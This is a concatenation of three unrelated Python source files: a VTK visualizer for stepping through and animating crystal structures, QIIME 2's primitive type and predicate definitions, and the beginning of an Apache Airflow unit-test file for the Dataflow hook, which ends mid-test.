"""
Args:
element_color_mapping: Optional color mapping for the elements,
as a dict of {symbol: rgb tuple}. For example, {"Fe": (255,
123,0), ....} If None is specified, a default based on
Jmol"s color scheme is used.
show_unit_cell: Set to False to not show the unit cell
boundaries. Defaults to True.
show_bonds: Set to True to show bonds. Defaults to True.
show_polyhedron: Set to True to show polyhedrons. Defaults to
False.
poly_radii_tol_factor: The polyhedron and bonding code uses the
ionic radii of the elements or species to determine if two
atoms are bonded. This specifies a tolerance scaling factor
such that atoms which are (1 + poly_radii_tol_factor) * sum
of ionic radii apart are still considered as bonded.
excluded_bonding_elements: List of atom types to exclude from
bonding determination. Defaults to an empty list. Useful
when trying to visualize a certain atom type in the
framework (e.g., Li in a Li-ion battery cathode material).
animated_movie_options (): Used for moving.
"""
super().__init__(
element_color_mapping=element_color_mapping,
show_unit_cell=show_unit_cell,
show_bonds=show_bonds,
show_polyhedron=show_polyhedron,
poly_radii_tol_factor=poly_radii_tol_factor,
excluded_bonding_elements=excluded_bonding_elements,
)
self.warningtxt_actor = vtk.vtkActor2D()
self.infotxt_actor = vtk.vtkActor2D()
self.structures = None
style = MultiStructuresInteractorStyle(self)
self.iren.SetInteractorStyle(style)
self.istruct = 0
self.current_structure = None
self.set_animated_movie_options(animated_movie_options=animated_movie_options)
def set_structures(self, structures, tags=None):
"""
Add list of structures to the visualizer.
Args:
structures (List of Structures):
tags (): List of tags.
"""
self.structures = structures
self.istruct = 0
self.current_structure = self.structures[self.istruct]
self.tags = tags if tags is not None else []
self.all_radii = []
self.all_vis_radii = []
for struct in self.structures:
struct_radii = []
struct_vis_radii = []
for site in struct:
radius = 0
for specie, occu in site.species.items():
radius += occu * (
specie.ionic_radius
if isinstance(specie, Species) and specie.ionic_radius
else specie.average_ionic_radius
)
vis_radius = 0.2 + 0.002 * radius
struct_radii.append(radius)
struct_vis_radii.append(vis_radius)
self.all_radii.append(struct_radii)
self.all_vis_radii.append(struct_vis_radii)
self.set_structure(self.current_structure, reset_camera=True, to_unit_cell=False)
def set_structure(self, structure, reset_camera=True, to_unit_cell=False):
"""
Add a structure to the visualizer.
Args:
structure: structure to visualize
reset_camera: Set to True to reset the camera to a default
determined based on the structure.
to_unit_cell: Whether or not to fall back sites into the unit cell.
"""
super().set_structure(structure=structure, reset_camera=reset_camera, to_unit_cell=to_unit_cell)
self.apply_tags()
def apply_tags(self):
"""
Apply tags.
"""
tags = {}
for tag in self.tags:
istruct = tag.get("istruct", "all")
if istruct != "all":
if istruct != self.istruct:
continue
site_index = tag["site_index"]
color = tag.get("color", [0.5, 0.5, 0.5])
opacity = tag.get("opacity", 0.5)
if site_index == "unit_cell_all":
struct_radii = self.all_vis_radii[self.istruct]
for isite, site in enumerate(self.current_structure):
vis_radius = 1.5 * tag.get("radius", struct_radii[isite])
tags[(isite, (0, 0, 0))] = {
"radius": vis_radius,
"color": color,
"opacity": opacity,
}
continue
cell_index = tag["cell_index"]
if "radius" in tag:
vis_radius = tag["radius"]
elif "radius_factor" in tag:
vis_radius = tag["radius_factor"] * self.all_vis_radii[self.istruct][site_index]
else:
vis_radius = 1.5 * self.all_vis_radii[self.istruct][site_index]
tags[(site_index, cell_index)] = {
"radius": vis_radius,
"color": color,
"opacity": opacity,
}
for site_and_cell_index, tag_style in tags.items():
isite, cell_index = site_and_cell_index
site = self.current_structure[isite]
if cell_index == (0, 0, 0):
coords = site.coords
else:
fcoords = site.frac_coords + np.array(cell_index)
site_image = PeriodicSite(
site.species,
fcoords,
self.current_structure.lattice,
to_unit_cell=False,
coords_are_cartesian=False,
properties=site.properties,
)
self.add_site(site_image)
coords = site_image.coords
vis_radius = tag_style["radius"]
color = tag_style["color"]
opacity = tag_style["opacity"]
self.add_partial_sphere(
coords=coords,
radius=vis_radius,
color=color,
start=0,
end=360,
opacity=opacity,
)
def set_animated_movie_options(self, animated_movie_options=None):
"""
Args:
animated_movie_options ():
"""
if animated_movie_options is None:
self.animated_movie_options = self.DEFAULT_ANIMATED_MOVIE_OPTIONS.copy()
else:
self.animated_movie_options = self.DEFAULT_ANIMATED_MOVIE_OPTIONS.copy()
for key in animated_movie_options:
if key not in self.DEFAULT_ANIMATED_MOVIE_OPTIONS.keys():
raise ValueError("Wrong option for animated movie")
self.animated_movie_options.update(animated_movie_options)
def display_help(self):
"""
Display the help for various keyboard shortcuts.
"""
helptxt = [
"h : Toggle help",
"A/a, B/b or C/c : Increase/decrease cell by one a, b or c unit vector",
"# : Toggle showing of polyhedrons",
"-: Toggle showing of bonds",
"r : Reset camera direction",
"[/]: Decrease or increase poly_radii_tol_factor by 0.05. Value = " + str(self.poly_radii_tol_factor),
"Up/Down: Rotate view along Up direction by 90 clockwise/anticlockwise",
"Left/right: Rotate view along camera direction by 90 clockwise/anticlockwise",
"s: Save view to image.png",
"o: Orthogonalize structure",
"n: Move to next structure",
"p: Move to previous structure",
"m: Animated movie of the structures",
]
self.helptxt_mapper.SetInput("\n".join(helptxt))
self.helptxt_actor.SetPosition(10, 10)
self.helptxt_actor.VisibilityOn()
def display_warning(self, warning):
"""
Args:
warning (str): Warning
"""
self.warningtxt_mapper = vtk.vtkTextMapper()
tprops = self.warningtxt_mapper.GetTextProperty()
tprops.SetFontSize(14)
tprops.SetFontFamilyToTimes()
tprops.SetColor(1, 0, 0)
tprops.BoldOn()
tprops.SetJustificationToRight()
self.warningtxt = f"WARNING : {warning}"
self.warningtxt_actor = vtk.vtkActor2D()
self.warningtxt_actor.VisibilityOn()
self.warningtxt_actor.SetMapper(self.warningtxt_mapper)
self.ren.AddActor(self.warningtxt_actor)
self.warningtxt_mapper.SetInput(self.warningtxt)
winsize = self.ren_win.GetSize()
self.warningtxt_actor.SetPosition(winsize[0] - 10, 10)
self.warningtxt_actor.VisibilityOn()
def erase_warning(self):
"""
Remove warnings.
"""
self.warningtxt_actor.VisibilityOff()
def display_info(self, info):
"""
Args:
info (str): Information.
"""
self.infotxt_mapper = vtk.vtkTextMapper()
tprops = self.infotxt_mapper.GetTextProperty()
tprops.SetFontSize(14)
tprops.SetFontFamilyToTimes()
tprops.SetColor(0, 0, 1)
tprops.BoldOn()
tprops.SetVerticalJustificationToTop()
self.infotxt = f"INFO : {info}"
self.infotxt_actor = vtk.vtkActor2D()
self.infotxt_actor.VisibilityOn()
self.infotxt_actor.SetMapper(self.infotxt_mapper)
self.ren.AddActor(self.infotxt_actor)
self.infotxt_mapper.SetInput(self.infotxt)
winsize = self.ren_win.GetSize()
self.infotxt_actor.SetPosition(10, winsize[1] - 10)
self.infotxt_actor.VisibilityOn()
def erase_info(self):
"""
Erase all info.
"""
self.infotxt_actor.VisibilityOff()
class MultiStructuresInteractorStyle(StructureInteractorStyle):
"""
Interactor for MultiStructureVis.
"""
def __init__(self, parent):
"""
Args:
parent ():
"""
StructureInteractorStyle.__init__(self, parent=parent)
def keyPressEvent(self, obj, event):
"""
Args:
obj ():
event ():
"""
parent = obj.GetCurrentRenderer().parent
sym = parent.iren.GetKeySym()
if sym == "n":
if parent.istruct == len(parent.structures) - 1:
parent.display_warning("LAST STRUCTURE")
parent.ren_win.Render()
else:
parent.istruct += 1
parent.current_structure = parent.structures[parent.istruct]
parent.set_structure(parent.current_structure, reset_camera=False, to_unit_cell=False)
parent.erase_warning()
parent.ren_win.Render()
elif sym == "p":
if parent.istruct == 0:
parent.display_warning("FIRST STRUCTURE")
parent.ren_win.Render()
else:
parent.istruct -= 1
parent.current_structure = parent.structures[parent.istruct]
parent.set_structure(parent.current_structure, reset_camera=False, to_unit_cell=False)
parent.erase_warning()
parent.ren_win.Render()
elif sym == "m":
parent.istruct = 0
parent.current_structure = parent.structures[parent.istruct]
parent.set_structure(parent.current_structure, reset_camera=False, to_unit_cell=False)
parent.erase_warning()
parent.ren_win.Render()
nloops = parent.animated_movie_options["number_of_loops"]
tstep = parent.animated_movie_options["time_between_frames"]
tloops = parent.animated_movie_options["time_between_loops"]
if parent.animated_movie_options["looping_type"] == "restart":
loop_istructs = range(len(parent.structures))
elif parent.animated_movie_options["looping_type"] == "palindrome":
loop_istructs = range(len(parent.structures)) + range(len(parent.structures) - 2, -1, -1)
else:
raise ValueError('"looping_type" should be "restart" or "palindrome"')
for iloop in range(nloops):
for istruct in loop_istructs:
time.sleep(tstep)
parent.istruct = istruct
parent.current_structure = parent.structures[parent.istruct]
parent.set_structure(parent.current_structure, reset_camera=False, to_unit_cell=False)
parent.display_info(
"Animated movie : structure {:d}/{:d} "
"(loop {:d}/{:d})".format(istruct + 1, len(parent.structures), iloop + 1, nloops)
)
parent.ren_win.Render()
time.sleep(tloops)
parent.erase_info()
parent.display_info("Ended animated movie ...")
parent.ren_win.Render()
StructureInteractorStyle.keyPressEvent(self, obj, event)
|
|
# ----------------------------------------------------------------------------
# Copyright (c) 2016-2022, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import numbers
import itertools
from qiime2.core.type.template import TypeTemplate, PredicateTemplate
import qiime2.metadata as metadata
import qiime2.core.util as util
_RANGE_DEFAULT_START = float('-inf')
_RANGE_DEFAULT_END = float('inf')
_RANGE_DEFAULT_INCLUSIVE_START = True
_RANGE_DEFAULT_INCLUSIVE_END = False
class _PrimitivePredicateBase(PredicateTemplate):
def get_kind(self):
return 'primitive'
def get_name(self):
return self.__class__.__name__
class Range(_PrimitivePredicateBase):
def __init__(self, *args, inclusive_start=_RANGE_DEFAULT_INCLUSIVE_START,
inclusive_end=_RANGE_DEFAULT_INCLUSIVE_END):
if len(args) == 2:
self.start, self.end = args
elif len(args) == 1:
self.start = _RANGE_DEFAULT_START
self.end, = args
elif len(args) == 0:
self.start = _RANGE_DEFAULT_START
self.end = _RANGE_DEFAULT_END
else:
raise ValueError("Too many arguments passed, expected 0, 1, or 2.")
self.inclusive_start = inclusive_start
self.inclusive_end = inclusive_end
if self.start is None:
self.start = _RANGE_DEFAULT_START
if self.end is None:
self.end = _RANGE_DEFAULT_END
if self.end < self.start:
raise ValueError("End of range precedes start.")
def __hash__(self):
return (hash(type(self)) ^
hash(self.start) ^
hash(self.end) ^
hash(self.inclusive_start) ^
hash(self.inclusive_end))
def __eq__(self, other):
return (type(self) is type(other) and
self.start == other.start and
self.end == other.end and
self.inclusive_start == other.inclusive_start and
self.inclusive_end == other.inclusive_end)
def __repr__(self):
args = []
start = self.start
if start == float('-inf'):
start = None
end = self.end
if end == float('inf'):
end = None
args.append(repr(start))
args.append(repr(end))
if self.inclusive_start is not _RANGE_DEFAULT_INCLUSIVE_START:
args.append('inclusive_start=%r' % self.inclusive_start)
if self.inclusive_end is not _RANGE_DEFAULT_INCLUSIVE_END:
args.append('inclusive_end=%r' % self.inclusive_end)
return "Range(%s)" % (', '.join(args),)
def is_element(self, value):
if self.inclusive_start:
if value < self.start:
return False
elif value <= self.start:
return False
if self.inclusive_end:
if value > self.end:
return False
elif value >= self.end:
return False
return True
def is_symbol_subtype(self, other):
if type(self) is not type(other):
return False
if other.start > self.start:
return False
elif (other.start == self.start
and (not other.inclusive_start)
and self.inclusive_start):
return False
if other.end < self.end:
return False
elif (other.end == self.end
and (not other.inclusive_end)
and self.inclusive_end):
return False
return True
def is_symbol_supertype(self, other):
if type(self) is not type(other):
return False
if other.start < self.start:
return False
elif (other.start == self.start
and (not self.inclusive_start)
and other.inclusive_start):
return False
if other.end > self.end:
return False
elif (other.end == self.end
and (not self.inclusive_end)
and other.inclusive_end):
return False
return True
def collapse_intersection(self, other):
if type(self) is not type(other):
return None
if self.start < other.start:
new_start = other.start
new_inclusive_start = other.inclusive_start
elif other.start < self.start:
new_start = self.start
new_inclusive_start = self.inclusive_start
else:
new_start = self.start
new_inclusive_start = (
self.inclusive_start and other.inclusive_start)
if self.end > other.end:
new_end = other.end
new_inclusive_end = other.inclusive_end
elif other.end > self.end:
new_end = self.end
new_inclusive_end = self.inclusive_end
else:
new_end = self.end
new_inclusive_end = self.inclusive_end and other.inclusive_end
if new_end < new_start:
return None
if (new_start == new_end
and not (new_inclusive_start and new_inclusive_end)):
return None
return self.__class__(new_start, new_end,
inclusive_start=new_inclusive_start,
inclusive_end=new_inclusive_end).template
def iter_boundaries(self):
if self.start != float('-inf'):
yield self.start
if self.end != float('inf'):
yield self.end
def update_ast(self, ast):
start = self.start
if start == float('-inf'):
start = None
end = self.end
if end == float('inf'):
end = None
ast['range'] = [start, end]
ast['inclusive'] = [self.inclusive_start, self.inclusive_end]
def Start(start, inclusive=_RANGE_DEFAULT_INCLUSIVE_START):
return Range(start, _RANGE_DEFAULT_END, inclusive_start=inclusive)
def End(end, inclusive=_RANGE_DEFAULT_INCLUSIVE_END):
return Range(_RANGE_DEFAULT_START, end, inclusive_end=inclusive)
class Choices(_PrimitivePredicateBase):
def __init__(self, *choices):
if not choices:
raise ValueError("'Choices' cannot be instantiated with an empty"
" set.")
# Backwards compatibility with old Choices({1, 2, 3}) syntax
if len(choices) == 1:
if not isinstance(choices[0], (bool, str)):
choices = choices[0]
self.choices = choices = tuple(choices)
if len(choices) != len(set(choices)):
raise ValueError("Duplicates found in choices: %r"
% util.find_duplicates(choices))
def __hash__(self):
return hash(type(self)) ^ hash(frozenset(self.choices))
def __eq__(self, other):
return (type(self) == type(other)
and set(self.choices) == set(other.choices))
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__,
repr(list(self.choices))[1:-1])
def is_element(self, value):
return value in self.choices
def is_symbol_subtype(self, other):
if type(self) is not type(other):
return False
return set(self.choices) <= set(other.choices)
def is_symbol_supertype(self, other):
if type(self) is not type(other):
return False
return set(self.choices) >= set(other.choices)
def collapse_intersection(self, other):
if type(self) is not type(other):
return None
new_choices_set = set(self.choices) & set(other.choices)
if not new_choices_set:
return None
# order by appearance:
new_choices = []
for c in itertools.chain(self.choices, other.choices):
if c in new_choices_set:
new_choices.append(c)
new_choices_set.remove(c)
return self.__class__(new_choices).template
def iter_boundaries(self):
yield from self.choices
def update_ast(self, ast):
ast['choices'] = list(self.choices)
def unpack_union(self):
for c in self.choices:
yield self.__class__(c)
class _PrimitiveTemplateBase(TypeTemplate):
public_proxy = 'encode', 'decode'
def __eq__(self, other):
return type(self) is type(other)
def __hash__(self):
return hash(type(self))
def get_name(self):
return self.__class__.__name__[1:] # drop `_`
def get_kind(self):
return 'primitive'
def get_field_names(self):
return []
def validate_field(self, name, field):
raise NotImplementedError
def validate_predicate_expr(self, self_expr, predicate_expr):
predicate = predicate_expr.template
if type(predicate) not in self._valid_predicates:
raise TypeError(str(predicate_expr))
for bound in predicate.iter_boundaries():
if not self.is_element_expr(self_expr, bound):
raise TypeError(bound)
def validate_predicate(self, predicate):
raise NotImplementedError
class _Int(_PrimitiveTemplateBase):
_valid_predicates = {Range}
def is_element(self, value):
return (value is not True and value is not False
and isinstance(value, numbers.Integral))
def is_symbol_subtype(self, other):
if other.get_name() == 'Float':
return True
return super().is_symbol_subtype(other)
def decode(self, string):
return int(string)
def encode(self, value):
return str(value)
class _Str(_PrimitiveTemplateBase):
_valid_predicates = {Choices}
def is_element(self, value):
return isinstance(value, str)
def decode(self, string):
return str(string)
def encode(self, value):
return str(value)
class _Float(_PrimitiveTemplateBase):
_valid_predicates = {Range}
def is_symbol_supertype(self, other):
if other.get_name() == 'Int':
return True
return super().is_symbol_supertype(other)
def is_element(self, value):
# Works with numpy just fine.
return (value is not True and value is not False
and isinstance(value, numbers.Real))
def decode(self, string):
return float(string)
def encode(self, value):
return str(value)
class _Bool(_PrimitiveTemplateBase):
_valid_predicates = {Choices}
def is_element(self, value):
return value is True or value is False
def validate_predicate(self, predicate):
if type(predicate) is Choices:
if set(predicate.iter_boundaries()) == {True, False}:
raise TypeError("Choices should be ommitted when "
"Choices(True, False).")
def decode(self, string):
if string not in ('false', 'true'):
raise TypeError("%s is neither 'true' or 'false'" % string)
return string == 'true'
def encode(self, value):
if value:
return 'true'
else:
return 'false'
class _Metadata(_PrimitiveTemplateBase):
_valid_predicates = set()
def is_element(self, value):
return isinstance(value, metadata.Metadata)
def decode(self, metadata):
# This interface should have already retrieved this object.
if not self.is_element(metadata):
raise TypeError("`Metadata` must be provided by the interface"
" directly.")
return metadata
def encode(self, value):
# TODO: Should this be the provenance representation? Does that affect
# decode?
return value
class _MetadataColumn(_PrimitiveTemplateBase):
_valid_predicates = set()
def is_element_expr(self, self_expr, value):
return value in self_expr.fields[0]
def is_element(self, value):
raise NotImplementedError
def get_field_names(self):
return ["type"]
def validate_field(self, name, field):
if field.get_name() not in ("Numeric", "Categorical"):
raise TypeError("Unsupported type in field: %r"
% (field.get_name(),))
def decode(self, value):
# This interface should have already retrieved this object.
if not isinstance(value, metadata.MetadataColumn):
raise TypeError("`Metadata` must be provided by the interface"
" directly.")
return value
def encode(self, value):
# TODO: Should this be the provenance representation? Does that affect
# decode?
return value
class _Categorical(_PrimitiveTemplateBase):
_valid_predicates = set()
def get_union_membership_expr(self, self_expr):
return 'metadata-column'
def is_element(self, value):
return isinstance(value, metadata.CategoricalMetadataColumn)
class _Numeric(_PrimitiveTemplateBase):
_valid_predicates = set()
def get_union_membership_expr(self, self_expr):
return 'metadata-column'
def is_element(self, value):
return isinstance(value, metadata.NumericMetadataColumn)
Int = _Int()
Float = _Float()
Bool = _Bool()
Str = _Str()
Metadata = _Metadata()
MetadataColumn = _MetadataColumn()
Categorical = _Categorical()
Numeric = _Numeric()
def infer_primitive_type(value):
for t in (Int, Float):
if value in t:
return t % Range(value, value, inclusive_end=True)
for t in (Bool, Str):
if value in t:
return t % Choices(value)
for t in (Metadata, MetadataColumn[Categorical], MetadataColumn[Numeric]):
if value in t:
return t
raise ValueError("Unknown primitive type: %r" % (value,))
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import copy
import shlex
import subprocess
import unittest
from typing import Any, Dict
from unittest import mock
from unittest.mock import MagicMock
from uuid import UUID
import pytest
from parameterized import parameterized
from airflow.exceptions import AirflowException
from airflow.providers.apache.beam.hooks.beam import BeamCommandRunner, BeamHook
from airflow.providers.google.cloud.hooks.dataflow import (
DEFAULT_DATAFLOW_LOCATION,
DataflowHook,
DataflowJobStatus,
DataflowJobType,
_DataflowJobsController,
_fallback_to_project_id_from_variables,
process_line_and_extract_dataflow_job_id_callback,
)
DEFAULT_RUNNER = "DirectRunner"
BEAM_STRING = 'airflow.providers.apache.beam.hooks.beam.{}'
TASK_ID = 'test-dataflow-operator'
JOB_NAME = 'test-dataflow-pipeline'
MOCK_UUID = UUID('cf4a56d2-8101-4217-b027-2af6216feb48')
MOCK_UUID_PREFIX = str(MOCK_UUID)[:8]
UNIQUE_JOB_NAME = f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}'
TEST_TEMPLATE = 'gs://dataflow-templates/wordcount/template_file'
PARAMETERS = {
'inputFile': 'gs://dataflow-samples/shakespeare/kinglear.txt',
'output': 'gs://test/output/my_output',
}
PY_FILE = 'apache_beam.examples.wordcount'
JAR_FILE = 'unitest.jar'
JOB_CLASS = 'com.example.UnitTest'
PY_OPTIONS = ['-m']
DATAFLOW_VARIABLES_PY = {'project': 'test', 'staging_location': 'gs://test/staging', 'labels': {'foo': 'bar'}}
DATAFLOW_VARIABLES_JAVA = {
'project': 'test',
'stagingLocation': 'gs://test/staging',
'labels': {'foo': 'bar'},
}
RUNTIME_ENV = {
'additionalExperiments': ['exp_flag1', 'exp_flag2'],
'additionalUserLabels': {'name': 'wrench', 'mass': '1.3kg', 'count': '3'},
'bypassTempDirValidation': {},
'ipConfiguration': 'WORKER_IP_PRIVATE',
'kmsKeyName': (
'projects/TEST_PROJECT_ID/locations/TEST_LOCATIONS/keyRings/TEST_KEYRING/cryptoKeys/TEST_CRYPTOKEYS'
),
'maxWorkers': 10,
'network': 'default',
'numWorkers': 2,
'serviceAccountEmail': 'test@apache.airflow',
'subnetwork': 'regions/REGION/subnetworks/SUBNETWORK',
'tempLocation': 'gs://test/temp',
'workerRegion': "test-region",
'workerZone': 'test-zone',
'zone': 'us-central1-f',
'machineType': 'n1-standard-1',
}
BASE_STRING = 'airflow.providers.google.common.hooks.base_google.{}'
DATAFLOW_STRING = 'airflow.providers.google.cloud.hooks.dataflow.{}'
TEST_PROJECT = 'test-project'
TEST_JOB_ID = 'test-job-id'
TEST_LOCATION = 'custom-location'
DEFAULT_PY_INTERPRETER = 'python3'
TEST_FLEX_PARAMETERS = {
"containerSpecGcsPath": "gs://test-bucket/test-file",
"jobName": 'test-job-name',
"parameters": {
"inputSubscription": 'test-subscription',
"outputTable": "test-project:test-dataset.streaming_beam_sql",
},
}
TEST_PROJECT_ID = 'test-project-id'
TEST_SQL_JOB_NAME = 'test-sql-job-name'
TEST_DATASET = 'test-dataset'
TEST_SQL_OPTIONS = {
"bigquery-project": TEST_PROJECT,
"bigquery-dataset": TEST_DATASET,
"bigquery-table": "beam_output",
'bigquery-write-disposition': "write-truncate",
}
TEST_SQL_QUERY = """
SELECT
sales_region as sales_region,
count(state_id) as count_state
FROM
bigquery.table.test-project.beam_samples.beam_table
GROUP BY sales_region;
"""
TEST_SQL_JOB_ID = 'test-job-id'
DEFAULT_CANCEL_TIMEOUT = 5 * 60
class TestFallbackToVariables(unittest.TestCase):
def test_support_project_id_parameter(self):
mock_instance = mock.MagicMock()
class FixtureFallback:
@_fallback_to_project_id_from_variables
def test_fn(self, *args, **kwargs):
mock_instance(*args, **kwargs)
FixtureFallback().test_fn(project_id="TEST")
mock_instance.assert_called_once_with(project_id="TEST")
def test_support_project_id_from_variable_parameter(self):
mock_instance = mock.MagicMock()
class FixtureFallback:
@_fallback_to_project_id_from_variables
def test_fn(self, *args, **kwargs):
mock_instance(*args, **kwargs)
FixtureFallback().test_fn(variables={'project': "TEST"})
mock_instance.assert_called_once_with(project_id='TEST', variables={})
def test_raise_exception_on_conflict(self):
mock_instance = mock.MagicMock()
class FixtureFallback:
@_fallback_to_project_id_from_variables
def test_fn(self, *args, **kwargs):
mock_instance(*args, **kwargs)
with pytest.raises(
AirflowException,
match="The mutually exclusive parameter `project_id` and `project` key in `variables` parameter "
"are both present\\. Please remove one\\.",
):
FixtureFallback().test_fn(variables={'project': "TEST"}, project_id="TEST2")
def test_raise_exception_on_positional_argument(self):
mock_instance = mock.MagicMock()
class FixtureFallback:
@_fallback_to_project_id_from_variables
def test_fn(self, *args, **kwargs):
mock_instance(*args, **kwargs)
with pytest.raises(
AirflowException, match="You must use keyword arguments in this methods rather than positional"
):
FixtureFallback().test_fn({'project': "TEST"}, "TEST2")
def mock_init(
self,
gcp_conn_id,
delegate_to=None,
impersonation_chain=None,
):
pass
class TestDataflowHook(unittest.TestCase):
def setUp(self):
with mock.patch(BASE_STRING.format('GoogleBaseHook.__init__'), new=mock_init):
self.dataflow_hook = DataflowHook(gcp_conn_id='test')
self.dataflow_hook.beam_hook = MagicMock()
@mock.patch("airflow.providers.google.cloud.hooks.dataflow.DataflowHook._authorize")
@mock.patch("airflow.providers.google.cloud.hooks.dataflow.build")
def test_dataflow_client_creation(self, mock_build, mock_authorize):
result = self.dataflow_hook.get_conn()
mock_build.assert_called_once_with(
'dataflow', 'v1b3', http=mock_authorize.return_value, cache_discovery=False
)
assert mock_build.return_value == result
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow(self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
py_requirements = ["pandas", "numpy"]
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow(
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_PY,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=py_requirements,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_options=PY_OPTIONS,
py_requirements=py_requirements,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow_with_custom_region_as_variable(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
py_requirements = ["pandas", "numpy"]
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
passed_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
passed_variables["region"] = TEST_LOCATION
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow(
job_name=JOB_NAME,
variables=passed_variables,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=py_requirements,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = TEST_LOCATION
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_options=PY_OPTIONS,
py_requirements=py_requirements,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=TEST_LOCATION
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow_with_custom_region_as_parameter(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
py_requirements = ["pandas", "numpy"]
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
passed_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow(
job_name=JOB_NAME,
variables=passed_variables,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=py_requirements,
on_new_job_id_callback=on_new_job_id_callback,
location=TEST_LOCATION,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = TEST_LOCATION
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_options=PY_OPTIONS,
py_requirements=py_requirements,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=TEST_LOCATION
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow_with_multiple_extra_packages(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
py_requirements = ["pandas", "numpy"]
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
passed_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
passed_variables['extra-package'] = ['a.whl', 'b.whl']
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow(
job_name=JOB_NAME,
variables=passed_variables,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=py_requirements,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
